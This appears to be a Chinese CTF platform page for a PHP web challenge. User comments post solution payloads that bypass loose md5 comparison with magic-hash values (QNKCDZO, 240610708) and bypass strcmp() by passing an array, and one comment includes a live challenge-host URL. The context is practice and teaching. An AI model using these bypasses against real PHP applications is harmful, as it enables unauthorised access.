前女友WEB 未解决

分数: 30 金币: 3
题目作者: 未知
一  血: chounana
一血奖励: 2金币
解  决: 6888
提  示:
描  述:
来源 山科大ctf
评论
lordinglord 11月前

http://117.72.52.127:19197/index.php?v1=QNKCDZO&v2=240610708&v3[]=a

回复 0

emm不取名字了 11月前

flag{*****}

回复 0

3344 1年前

flag{**********}

回复 0

Arya32f 1年前

/?v1=QNKCDZO&v2=240610708&v3[]=1或者/?v1[]=1&v2[]=2&v3[]=1

回复 0

HK1ng 1年前

首先CTRL+U查看源码,发现存在超链接,点击进去之后,代码审计,第一关是md5弱类型比较,然后用了strcmp()函数进行弱类型比较,直接传一个数组,PHP 8.0 前 strcmp() 会返回 null,加上取反,直接绕过。

回复 3

goodsnack 1年前

弱类型比较,传数组即可

回复 0

harven 1年前

http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test

回复 0

smtall 1年前

用deepseek做出来了

回复 2

大棕兔爸爸 1年前

存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc

回复 1

welltian 1年前

/?v1=QNKCDZO&v2=240610708&v3[]=123

回复 0

WriteUp

image
harry

3 金币

评分(14)

解题动态

ctf_winner 攻破了该题 13小时前
kgdw1313113 攻破了该题 14小时前
Aholic· 攻破了该题 17小时前
testctffff 攻破了该题 21小时前
甜小甜 攻破了该题 1天前
hellonight 攻破了该题 1天前
1302074808 攻破了该题 1天前
Shaye 攻破了该题 1天前
orr_ 攻破了该题 1天前
wz666 攻破了该题 1天前
13002045137 攻破了该题 1天前
cc131 攻破了该题 2天前
白色狸花猫 攻破了该题 2天前
我是新手* 攻破了该题 2天前
落梅雨 攻破了该题 2天前
喜羊羊1 攻破了该题 2天前
呵呵 攻破了该题 2天前
ajdnckwkjf 攻破了该题 2天前
Tychema 攻破了该题 2天前
拾叁 攻破了该题 2天前
问题反馈